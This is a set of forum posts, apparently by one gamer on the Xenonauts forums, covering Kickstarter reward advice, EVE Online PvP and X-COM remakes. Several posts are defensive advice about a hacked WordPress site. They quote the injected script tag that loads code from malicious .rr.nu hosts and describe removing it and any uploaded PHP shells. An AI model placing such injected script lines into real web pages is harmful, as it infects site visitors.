  1. Present day Iceland is one of the few countrie worldwide without an army at all. They do have an agreement with the USA for protection though. Not sure what the situation was in 1977.
  2. Ow jeah, credit were credit is due, Chris has been more then awesome on the forums.
  3. There should be a 1 dollar tier; reward could be a highres wallpaper or something very little but still attractive. The idea behind the 1 dollar tier is that once they are part of the kickstarter they may well get tempted to increase their pledge during the coming weeks. It keeps them coming back. Also for the 5000+ reward tiers how about letting them choose an extra tileset according to their prefs; i.e. jungle, snow, tundra, whatever... It would basicly grant those backers something unique to add to the game that we will all benefit from. It kinda depends on the cost of making a tileset I guess. And the whole fly to england thing and have lunch with you... Well ok... I would simply keep that in as cream on the pie for the 5k but in all honesty; Yes I'd love to have lunch with Brian Fargo or another historic big name game designer - which with all due respect - You are currently not (yet). Also in your update you said you didnt plan on updating untill the goal was met. Wrong. Kickstarter is social media. Treat it as such. Create an interactive experience, make them part of it, create a community, create an us feeling.
  4. Aye, I was just coming back that after three times of reading it turned out that I was reading over it. It might be me but for some reason I've gotten accustomed to the closing sentence this reward also includes the previous tiers. I also think I know why i read over it. When I read that I want to know what cool reward this tier is all about; so I skip the part that says as $xxx.
  5. How about: 1. For 1000+ help naming and designing a soldier medal, and have your soldier picture and name referenced in the description (i.e. The first ever soldier to receive this medal was DrAtomic for his bravery shown in the battle of bla bla bla). 2. Tank skins, per input of the donator? 3. Vehicles or building signs in game with your name in it, i.e. DrAtomic Pharmacy delivery truck or DrAtomic's Pharmacy. 4. Hollywood tileset with tiles with donators names (i.e. in game walk of fame) as an additional reward tier around 150 mark. Jup all art im afraid. Ps. also in the higher tiers it's not clear if you are getting the previous tiers too.
  6. I love the Panzer General boardgame installement on Xbox Live sadly hasnt sold a lot I think.
  7. Hmmm, ok, so trust is the issue with that suggestion, which in all fairness is understandable. Wouldnt a notary be willing to help out though? Or a combination of a US citizen using a notary for the money as a third-party account. Another thing that might be an issue with a fundraiser like this could be taxes.
  8. Call me a pessimist, call me a partypooper, call me negative but, looking at IGG the most funding any game has received through IGG is a meagerly 16k, followed by roughly 4 projects around 13k then a shrap drop off. IGG simply is lacking the traffic compared to kickstarter. Since this project doesnt have the traffic volume itself (like double fine had) it will be depended on the funding site for traffic and momentum. Honestly doing this through IGG seems like a mistake to me; heck if you are looking for funding in the range of $15k; you rather try to get an investor onboard; heck I'll invest that much for the propper return. Bringing an american onboard for the sole purpose of being able to do this through kickstarter seems like a much better idea to me.
  9. I whole heartly disagree. Consequential pvp does not make the combat, it only affects the result. Sure it gives you a higher thrill if you live or die but at heart it doesnt do anything at the combat level. The simple fact that there is no equality in EvE automaticlly translates to poor gamer vs gamer combat. 1 v 1 the outcome is predetermined based on your fittings and ship type versus that of the other. In an encounter of players of equal skill that means one will run and the other one will chase. This causes people to move in packs, but packs dont offer safety either. As it all boils down to who has the greater numbers. Which in fact causes people to log off in space in order to dissappear and a gazillion other semi-cheats to try and stay out of harms way. PvP in EvE is either huge blobs lagging each other to death without any real skill involved (except for those commanding the blobs), or stupid gate camps that last untill a bigger blob takes over or belt hunting lone (or small packs) pve-ers and killing them. If anything combat is hugely imbalanced. When you are on the winning side it's all great fun but to loose what you have spend years working for purely and soley due to lag is just ridiculious (we build a station that was lagged to death, we had sufficient caps to defend it). On a smaller scale it can be fun though. Consequences for your actions are pretty good in EvE though, but you cant really pvp in the sense of pvp. DAOC was and is unmatched in the MMORPG world pvp wise simply due to limits imposed on groupsize. Groups had 8, this caused groups to consists of 8-12 permanent members all used and depended on each others playstyle. Blobs or in DAOC terms zergs were possible too (multiple groups working together) but due to zergs being way less manageable and attracting lesser players a single group of 8 stood a chance against them. You were at an advantage keeping to 8 because you were able to respond so much faster, hit and run, hit and run. One time we blew up an either zerg of around 100 players huddled together with what was meant to be a suicide AOE bomb with just the 8 of us. Stuff like that simply isnt possible in EvE. I'll stop but in my book there is really only one thing that makes EvE shine and that is the fact that it is the only true mmorpg out there. If you play EvE it means I can come and find you. If you play WoW or DAOC or whatever else, I first need to ask you which country do you play in, which server are you on? In that sense all MMORPGs with the exception of EvE are nothing but multiplayer games. MW or BF are as much a MMORPG as the so called MMORPGs be it that they allow for a grander scale. EvE however, there is only one EvE, one world, 400k players (actually there is a second EvE in China due to local regulations there).
  10. Very true, reason I said it though was to eliminate any php shells that might have been uploaded. Most of those are detected by AV software.
  11. *. Check the modification date of your index.php (since it got infected again) to check what the last time of getting infected was/is. *. Download all the webfiles to your local computer *. Search for the string '.rr.nu' in all files *. Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete. *. Check the content of your .htaccess (could contain a malicious rewrite rule) and make sure it is what it should be. If unsure or if you never modified the original then simply delete it and replace it with an original that comes with the wordpress sources. My guess is that you do use url rewrite (search engine friendly urls based *. Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfest the website). *. Make sure to run a maleware scanner on your own computer as well. *. Once everything is clean again, reset your passwords again just to be sure.
  12. It got injected again... <script src="http://chelpo94landsa.rr.nu/mm.php?d=1"></script>
  13. You're welcome. Common cause outside of the website sources itself are farmed ftp accounts. Website wise; just be sure to be running the latest version of wordpress and also make sure to check if any plugins need updating (from your wp admin area).
  14. The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script. Most common causes are farmed FTP passwords or usage of opensource software that needs to be updated or usage of variables in custom code that arent checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed, clean the website first before running it though.
  15. Controls on console were illogical and frustrating too lol (quest log under start button instead of under B menu). Still great game! It was published for Amiga, Amiga CD32, DOS, PlayStation, Windows. See http://en.wikipedia.org/wiki/UFO:_Enemy_Unknown
  16. So what's consolization? Tedious, boring, annoying bits taken out for more dynamic fun to play systems after extensive (internal) playtesting? You do know that the original was a console title (playstation, amiga) to start with? Wether or not you like consoles is a matter of personal preference; Do you prefer to hang leisurely in your couch while playing, don't want to worry about virusses/malware/worms/trojans, hate cheaters, don't want to spend $$$ every half year on upgrades of your hardware in order to play that next great game and dont want to fiddle around with updates then a console is the thing to use. Do you prefer sitting at a desk, don't care about cheaters, want top notch graphics, want games that take days and have extreme micromanagement options (CIV), want games that require a keyboard to control (RTS), want cheaper games in return for higher platform investments, don't care about protecting/updating your machine and don't want to use your television for gaming then PC/Laptop is the way to go. Don't be an internet monkey who simply repeats terms, in an ideal gamers world you'd have all platforms or better yet everything would work brilliantly on a single platform. Reality is different. This throwing around terms like consolization is fanboy behavour stimulated by marketing departments. Those fanboys often are jealous about something they have not or can't afford and thus justify that feeling by talking down other platforms. Btw, this isnt meant as a personal attack, just saying don't throw a term like that about without actually thinking about it. I agree with your point that it's going to be more spiritual successor which is updated to cater to todays expected gaming experience whilst trying to keep the original feel. It wont be a graphical updated exact copy like Xenonauts is trying to be (heh even Xenonauts has some changes over the original).
  17. Montie, consider this; Firaxis made a brilliant remake of Civilization I/II in the form of Civilization Revolution. The way they attained that goal was by playtesting throughout the development cycle. They stated clearly that the way they started development was by making a prototype that was an exact copy of x-com. From that copy they started testing mechanics, changes and options and they came to the conclusion that those were the better, more fun choices. Personally not having played the game I would say the same thing you say; bah ammo needs to be in, bah i want realistic squadron sized teams not a couple of rambos ruling the world, bah i want inventory management, bah i want time units, bah i just want the exact same X-Com version with better graphics. Reading and listening to the devs explaining why they made the deciscions convinced me on almost all of the changes except for the squad size limits and lack of equiping. Firaxis has shown and a track record to go with it that they will get it right. Only goof I know off was CIV V, and that was mainly due to them releasing it too early under budget pressure. Had they taken 3 more months then CIV V would have been great. Sure it still would be a change from CIV IV but then again if you want to play CIV IV, play CIV IV. They continued the support of CIV V though and with patches it's a great title. Bottomline is that you have to realise that Firaxis is basicly making X-Com 2 whilst doing everything they can through playtesting to keep the exact feeling of X-COM EU but they arent remaking X-COM EU with juicy graphics. Will they get it right? I have high hopes and trust they will, I will most certainly buy it, love the fact I'll be able to play it on my xbox. Do you want a remade X-Com EU with better graphics? You've found the place to be, it's Xenonauts. Will they deliver in the end? Sure looks like they are track, but time will tell (AI being a major factor). Will I personally buy it? Still on the fence here, main gripe is that it's a PC game.. couch gaming ftw. I may end up chipping in just to support the guys.
  18. With regards to ammo management, I always struggled getting enough ammo for the refills after the mission (always short on funds), as a result I sometimes ran out of ammo during missions as well. In such a case I simply didnt give them enough ammo to start with because I didnt have the funds to give it to them in the first place. I had them pickup weapons from casualties during play. All in all it probably wont matter too much from a gameplay perspective and I can see why they scrapped it; it could easily be replaced by something like a single mission cost factor covering all factors like fuel, ammo, laundry, food, drinks and add a repairbill on top of that.
  19. I wonder how far you can go with kickstarter, it's not just Double Fine that's doing well there. To an extend the Double Fine success is explainable, two of the most legendary names in the business for us old-school gamers (who didnt like, days of the tentacles, sam and max, monkey island, etc) asking to fund an old-school type of game for an expertise they are legendary for. Pledging support also rewards those pledging with a pre-order for a game they would have most likely bought anyway, it makes sense that this is a success. Also note that the day before kickstarter they received a lot of press about the idea of wanting to make a new adventure type game or make psychonauts 2 due to the minecraft creator stating that he is/was willing to fund the entire development of it (most likely in exchange for a revenue share or part of the royalties). All eyes were on Double Fine because of this allready and at that exact moment they launch the kickstarter campaign. Brilliant marketing scheme or pure luck/coincidence? Now look at another kickstarter campaign that is highly succesfull; Order of the Stick reprint drive. Essentially this is a webbased comic that also has some books in print but didnt have the money to restock the out of print issues. They needed close to $60K in order to reprint and resupply comicbook stores. This is where it get's interesting; the reward packages originally included nothing but some digital stuff except for the upper tier reward packages. Again brilliant marketing seems to be the foundation of the success here, nearing his target the creator started adding additional rewards stimulating those allready pledged to upgrade or pledge more. Also his updates through the comic styled graph is something to keep people returning to the drive. To put things in perspective though, OOTS was averaging 210k unique visits a day back in 2007 allready. The fan base is huge; put that against the 10k pledges and you are looking at roughly 2% of his community supporting the drive (estimating the readerbase at 500k). If you read carefully you will see that the OOTS drive is basicly funding his reprints without him having any costs for that plus way more (due to the escalating reward packages he's looking at a serious shipping bill though). Still bottomline remains that his community basicly covered all his business expenses for putting his product on the shelves to start earning money. Is it all a free paycheck then? No. If you look at Indy games asking for funding you'll see a lot of failed projects or projects that barely miss or make small targets (talking about ~$1k request). On the other hand some small success stories are to be found too. What seems to work? In other areas physical technological gadgets seem to be extremly successfull too; again this is basicly a pre-order system again. What you can learn from looking at those succesfull projects is that you need a big and strong community to get the drive going, rewards need to be inline with what the community considers as wow-must-have-that, continued exposure for the drive, a slick video presenting and motivating the drive, somthing to show for and regular updates that keep those pledged allready coming back but also pulls those not yet pledged in. Analysing this for Xenonauts I would say that there is definetly potential on the we want this level amongst old-school gamers, there is more then enough to show for, excellent reward packages can be created. Two big pitfalls exist however, one being sufficient exposure and reaching those old-school gamers and the second one is the firaxis project looming and being known allready. Get this marketed and it will be a succesfull drive too. I keep wondering if you could pull off a drive for a Bugati Veyron or something silly like that if marketed properly; my guess is someone will try and succeed looking back at the success of crazy stuff like the one million dollar page from a couple of years ago. Crowd-funding hasn't reached it's full hype potential yet and you most likely need to time something silly with that hype peak (luck required) after that it will mature and become a natural process for high risk techno stuff, actual products and software alike untill it get's a bad name due to projects with funding failing to deliver. Do you realise that Kickstarter.com has made around $300k-$500k in revenue shares (they take 5% of all successfull pledges); that is good money for a simple low maintenace website like that imho.
  20. This! With the exception of: I always preffered the small operations too. Large operations were just bleh. But there is only so much you can do. For instance we were the first victim in the whole Goons vs. BoB thing. We had setup our own station as part of Maelstrom then we got lagged to death by 2000 goons plus tfc plus assorted others, held up for a week with the help of MC but still was no way we could do anything against the lag mainly. We had the skills, the fc's, the caps but it was simply unplayable to the point where tactics didnt matter. Up North samething happened we used to be the lice in the pels of the NC; we were far superior both in tactics, sp, fittings and fcs but in the end got blobbed to oblivion. That was the fun of syndicate back in the days; 100 ships counted as a blob (pre-bruce-goon-like-membership-explosion). In Eve you can win a 100 vs. 30-50 fight with good fc-ing and tactics; however as soon as lag becomes a factor it's all down to numbers.
  21. in no order: mechforce - TBS/AMIGA x:com enemy unknown - TBS/AMIGA civilization (1, 2 & revolution) - TBS/PC-XBOX bf:bad company - FPS/XBOX Settlers of Catan - Boardgame/XBOX Elder Scroll series (especially morrowind and skyrim) - RPG/XBOX Command & Conquer (original & red alert 2) - RTS/PC Dark Ages of Camelot (DAOC) - MMO/PC
  22. I always lived in 0.0 and spend my last bit in lowsec; 0.0 was great but as I said the pvp mechanics are all about ganking. Devs have been trying to change that since 2004 but keep failing. Simply put 2 > 1 translates into 1000 > 100 in EvE. It's simply not fun in the long run due to this and the game design encourages this game play style. Players play in corporations (guilds), corporations are able to join alliances of mulitple corporations, alliance are able to create meta alliances with standings = blob. The most fun I had was being part of OSS in Syndicate, we had a great couple of systems there with a pipe in front of it. One guy monitored the entrance to the pipe which was about six jumps out from our home systems. Any enemy activity would result in a call to arms where everbody would jump in their pvp ships based on the intel of incoming ships and lock down the entry gate to our home systems. Had many many many great battles there, only time it felt like trully controlling and fighting for our own space.
  23. Loved and hated Eve at the same time, too slow at times and pvp is way too much about ganking than it is about strategic warfare, especially with the losses. Hated having to grind pve in order to repay losses. Also hated the skill system and need for buffbots (second accounts). Look up my toon in game for join date (cant remember, name is DrAtomic) over 70 million SP. Still best Elite like game on the market, love the one world true MMO approach, instead of the multiplayer which server do you play on Warcraft approach. In my book the only real MMO on the market. MMORPG wise DAOC is best one out there, hands down.
  24. Lurker coming forward here: 1). UFO:ET failed imho even with bmans mod simply because the lack of randomised battle scenes. I loved playing it for a bit, prolly spend around 40 hours with it but then binned it because it became all the same and more of the same. Will buy UFO:ET2 most likely but only if it features randomised battle fields. 2). Will order Xenonauts. It does look like a real remake (no female soldiers what gives!!!) and I love the tweaks they look to have made. Dont know about gameplay because I simply need to pre-order still heh. 3). I really hate people talking about 'dumbing down for consoles', that is such a rubbish statement. Would you rather hang in your couch playing a game or sit at a desk playing the same game. There is no need for dumbing things down on a console and there are many great and deep games available on consoles (R.U.S.E for example). Intuative controles is something different then dumbing down gameplay. One thing consoles do not handle well are RTS, nobody has succeeded in making a RTS that plays great on consoles, in the sense of real RTS games like supreme commander. Because RTS sims like Tropico work great if not better on consoles. 4). I will also buy Fireaxis X-Com remake, but early screens have me dissappointed; looks like they are setting up for failure again. If not for the 'we love and play the original' video I would have disgarded the title. It looks like they are over modernising things again and the big question will be; will it work. It may turn out to be the first great sequel and rebirth of the series. I pray that they wont disregard the randomised battle fields as a core necessity; with them playing the original my hopes are up in that regard. I sincerly hope they will catch the magic that made the original great. 5). Funny how nobody has been able to duplicate an 18 year old game that was made by just 2 guys in 2 years time. I have high hopes for Xenonauts though. 6). As much as I totally loved playing X-Com, I dropped the title like a brick back in the day when I got my first taste of Command and Conquer. 7). Real happy with the Fireaxis remake being made for consoles!!! Couch gaming FTW! 8). Fireaxis did a brilliant job with Civilization:Revolution, it really did recapture the CIV I feel with some extra's here and there. Defo is a classic on the consoles.
